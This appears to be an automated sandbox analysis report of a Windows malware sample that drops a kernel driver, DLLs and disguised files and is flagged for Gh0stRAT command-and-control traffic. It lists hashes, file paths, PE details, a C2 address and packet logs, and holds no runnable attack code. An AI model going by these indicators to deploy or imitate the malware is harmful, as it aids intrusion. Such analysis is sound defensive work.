File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\a[1].gif

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\s[1].dat

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.711681887118906
Encrypted:	false
SSDEEP:	384:9+egCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQq:d5F1FUdy422IK+gAZt2i0YPpQn4GMB
MD5:	3398FEF004CF7BA322FE7040ECD6FA86
SHA1:	DF8B6CF4236CA0C7312D5151E35B97A61C639F1D
SHA-256:	320847BD130F82016123930FC06E2D4240A902D4269AB0283C08CE7F070259BA
SHA-512:	F9298F2F380C18A2CDA0B0C55D3CEB17B836CE48A25C6641D71DAB672D268E4DBD77C3EABD6E28B54C2EC9DE11D0D5A6B1D0554DFEAB8F4C225DB5474AAB78AF
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb.scbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.999938756744487
Encrypted:	true
SSDEEP:	98304:qAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:pndLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	8E8BCDA73E393FC021C2C60B4A87E5DB
SHA1:	CBCB8437D312BCFB0A6E08B734B40B69FCF29C9E
SHA-256:	4FB7185FD9FBD3C0955556E7EFFEB32FA9CF0205AF43704C607B33EAEAA71C75
SHA-512:	722BC859D3506EF1BF653E8499CA68425221D4E20F433411291FB3821DA85262B5295D2F0947BB94DF8909E8C31E8514763F4BA724BF41D21EFC57A10F47ED25
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q%.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.978936157803007
Encrypted:	false
SSDEEP:	192:JBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:JBuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	510C9BB2DA2F26ABC4C9423D95692BDE
SHA1:	B729241DD3D761350DEA66D009DFE89F35F44105
SHA-256:	371D1D601A91B863B1D8535A9E9C66F07A71FD8D0F68F8BCC7BEAF636F428860
SHA-512:	014EEB5E784FEFDD7D98B346AD21DEC4D821253E7D2644619CCE1851D7A7A11B7B4301C8582DF5B8B060CB01BE396EF1EBBF6FA8546369278095EA0354CFDA60
Malicious:	false
Preview:	GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\cajXRH.exe

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.002069275426236
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52F/:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5g/
MD5:	D042CB3A77E08F11474890E3854D6E48
SHA1:	5876387B893552B1A34BEE7792FF03863CA0BAF2
SHA-256:	98461262D243284144F140EEC9F072A9BC62493EC188704B2D78302F6B1DA012
SHA-512:	E88F6113AEC9CC4EABABE08BD23BCC80168D2202236AC5359BE34362C1DC4DF49F01740886552CEBB69EC60F93B8F2CAEC7878660A4CCA17FCCE6E8DAF4456B3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\1387457-38765948.15.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.229150694372507
Encrypted:	false
SSDEEP:	384:s3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/R:sOUkgfdZ9pRyv+uPzCMHo3q4tDghr
MD5:	85F859B2A0464AD29A1534BABF0D57DE
SHA1:	5E562B3E543C0DC4C8D82396C0567A2899B09072
SHA-256:	E9494D9E680A33B269D27D7AB52D567196F29AE9E77D97BF41210D9E46A7C1B4
SHA-512:	281571414E8D24DD9D43DDC0D2456E66198C93F4D689B2958EA366B15B05D69BBC79FC6F2D3CC906C33F410D358C93ABFF8FA54842567E151C7596A2D5BD0C05
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\xxxx.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Program Files (x86)\4fkch1\4fkch1.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	297
Entropy (8bit):	4.392147822571038
Encrypted:	false
SSDEEP:	3:ri9K0/ldl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl8/lP92lU8IAuUWKznla:ri9TDTwPYtyjtOsNaG4oiZU2d
MD5:	B54841E5494AFAE254B932103BB3A85B
SHA1:	DC967BDF24F4A034B80BB7ACCC8E25D27E31F04F
SHA-256:	C886FBF5A18E65F839046D0D0F5080B18C9564FD4E5236423059F2FEBEF3B198
SHA-512:	D2791E9649EF7D7BA599709A212DB2EA2FA25E5C6CA994552346C454751F246556F9373E197A9AFBCD6FE8F575D038189863A7D6E99E14CCD56E4AA46C24500E
Malicious:	false
Preview:	..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ........n/../.$wly.

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	0.1079397912024875
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1387457-38765948.15.exe
File size:	30'954'656 bytes
MD5:	947cd5df10d540b879c037c1cb519e63
SHA1:	8e4f326d08b675c077dc1d19246bac5eaa0f73dc
SHA256:	29f92fd013bdfc23e6b1a088f68b7bf4acf423bcc440d0ff49ac0079a38c5072
SHA512:	8516a7ff71fdcf2ff6e0210023fec4f064e0b3d3f520938a2259f0701bc69584239f502e0a11d1374cdf436d990b0592bd9c67c117ed7528c57e86c638c9631e
SSDEEP:	3072:H4Df3i8mhK5BSHO/3RBFADIDhwhKBE3Ukepa9Z2tH9bPP29NLG/ZWWHdpiQzQ:H4Dfy8neu/3/H9whKBE4eK/ZWW9piQzQ
TLSH:	6467281B5350E99DEC31B07CD0008795ABA27C253293FF9A52E07A9EDF721C19D2B627
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................85......85......85..............................QV/.............%.......%.........s.....%.......Rich...........

File Icon


Icon Hash:	1268c4ce68328e40

Static PE Info

General

Entrypoint:	0x140004f04
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
Time Stamp:	0x660D9ED0 [Wed Apr 3 18:24:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	a960218d8123ac2428e0da4c17ab3175

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	06/05/2022 09:44:54 06/05/2024 09:44:54
Subject Chain	CN=YANDEX LLC, O=YANDEX LLC, STREET="Leo Tolstoy street, 16", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1027700229193, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	07A79C5F2F79548D1AC45A792866ABD9
Thumbprint SHA-1:	F55522C99528A0C94883E56FF946AC088091E573
Thumbprint SHA-256:	1561AE150E66F6D2B3BCEDA46D46525EDCAF8697D3BC94485150865DC40EF888
Serial:	7904D32E74FC472B66C08A38

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FDCC4840CFCh
dec eax
add esp, 28h
jmp 00007FDCC483CAD7h
int3
int3
retn 0000h
int3
and dword ptr [00016B45h], 00000000h
ret
dec eax
mov dword ptr [esp+08h], ebx
push ebp
dec eax
lea ebp, dword ptr [esp-000004C0h]
dec eax
sub esp, 000005C0h
mov ebx, ecx
mov ecx, 00000017h
call 00007FDCC484B49Dh
test eax, eax
je 00007FDCC4840926h
mov ecx, ebx
int 29h
mov ecx, 00000003h
call 00007FDCC48408EAh
xor edx, edx
dec eax
lea ecx, dword ptr [ebp-10h]
inc ecx
mov eax, 000004D0h
call 00007FDCC48412BDh
dec eax
lea ecx, dword ptr [ebp-10h]
call dword ptr [0000C08Eh]
dec eax
mov ebx, dword ptr [ebp+000000E8h]
dec eax
lea edx, dword ptr [ebp+000004D8h]
dec eax
mov ecx, ebx
inc ebp
xor eax, eax
call dword ptr [0000C1F4h]
dec eax
test eax, eax
je 00007FDCC484095Eh
dec eax
and dword ptr [esp+38h], 00000000h
dec eax
lea ecx, dword ptr [ebp+000004E0h]
dec eax
mov edx, dword ptr [ebp+000004D8h]
dec esp
mov ecx, eax
dec eax
mov dword ptr [esp+30h], ecx
dec esp
mov eax, ebx
dec eax
lea ecx, dword ptr [ebp+000004E8h]
dec eax
mov dword ptr [esp+28h], ecx
dec eax
lea ecx, dword ptr [ebp-10h]
dec eax
mov dword ptr [esp+20h], ecx
xor ecx, ecx
call dword ptr [0000C1BBh]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19af0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d77000	0x10400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1d76000	0xe7c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1d82c00	0x28a0	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d88000	0x640	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x18740	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x188b0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x187b0	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x2e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xf2dc	0xf400	92151013447fb3f2d89a0eb0689389ef	False	0.5336353739754098	data	6.3728130766478825	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x94b0	0x9600	b6c5607f532945a497a3dd9ec32e34e8	False	0.42380208333333336	data	4.7375559254011765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x1d5ace4	0x1d58200	3d87169ee8c7fd21de7968eb5c4a77d1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1d76000	0xe7c	0x1000	ebfc7d80ce38e3ab843fa63d2287afdf	False	0.43701171875	data	4.481426700060546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1d77000	0x10400	0x10400	abe4ac1b8181f9a4987480c9413a557e	False	0.10115685096153847	data	3.008124803901922	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1d88000	0x640	0x800	8a59f1b22252635e9e76e3c3f27b6b51	False	0.5537109375	data	4.840560734683175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1d77658	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	English	United States	0.1312588568729334
RT_ICON	0x1d7b880	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.17022821576763486
RT_ICON	0x1d7de28	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.2171669793621013
RT_ICON	0x1d7eed0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.35815602836879434
RT_ICON	0x1d7f378	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	English	United States	0.1312588568729334
RT_ICON	0x1d835a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.17022821576763486
RT_ICON	0x1d85b48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.2171669793621013
RT_ICON	0x1d86bf0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.35815602836879434
RT_GROUP_ICON	0x1d7f338	0x3e	data	English	United States	0.8225806451612904
RT_GROUP_ICON	0x1d87058	0x3e	data	English	United States	0.8870967741935484
RT_VERSION	0x1d772b0	0x3a4	data	Russian	Russia	0.4656652360515021
RT_MANIFEST	0x1d87098	0x365	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (809), with CRLF line terminators	English	United States	0.4844649021864212

Imports

DLL	Import
SHLWAPI.dll	StrCmpIW, StrCatW, StrCpyW, PathAppendW
KERNEL32.dll	RtlCaptureContext, CreateFileW, WriteConsoleW, SetFilePointerEx, GetConsoleMode, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, RaiseException, LoadLibraryW, GetProcAddress, FreeLibrary, GetModuleFileNameW, FindFirstFileW, FindNextFileW, FindClose, DeleteFileW, OpenProcess, WaitForSingleObject, CloseHandle, TerminateProcess, GetCommandLineW, lstrcmpiW, lstrcpyW, ExitProcess, CreateToolhelp32Snapshot, Process32FirstW, GetCurrentProcessId, Thread32First, Thread32Next, Process32NextW, InitializeCriticalSectionEx, GetLastError, DeleteCriticalSection, GetConsoleCP, FlushFileBuffers, GetStringTypeW, SetStdHandle, GetFileType, IsDebuggerPresent, OutputDebugStringW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, CreateEventW, GetModuleHandleW, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, SetLastError, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetCurrentProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, WriteFile, GetACP, LCMapStringW, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetEnvironmentStringsW, VirtualAlloc
USER32.dll	DispatchMessageW, PostThreadMessageW, CharNextW, GetMessageW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-12T04:12:15.985589+0100	2852901	ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin	1	192.168.2.4	50019	8.210.64.208	8917	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 04:11:03.668189049 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:03.668230057 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:03.668483973 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:03.682185888 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:03.682204962 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:04.912954092 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:04.913168907 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:04.914061069 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:04.914216995 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.106525898 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.106540918 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:05.106985092 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:05.107058048 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.109036922 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.155325890 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:05.421781063 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:05.421930075 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:05.421938896 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.421981096 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.428072929 CET	49739	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.428090096 CET	443	49739	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:05.539807081 CET	49740	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.539897919 CET	443	49740	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:05.540020943 CET	49740	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.540330887 CET	49740	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:05.540373087 CET	443	49740	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:06.841738939 CET	443	49740	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:06.841847897 CET	49740	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:06.842370033 CET	49740	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:06.842391968 CET	443	49740	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:06.842624903 CET	49740	443	192.168.2.4	47.101.26.25
Jan 12, 2025 04:11:06.842636108 CET	443	49740	47.101.26.25	192.168.2.4
Jan 12, 2025 04:11:07.154709101 CET	443	49740	47.101.26.25	192.168.2.4
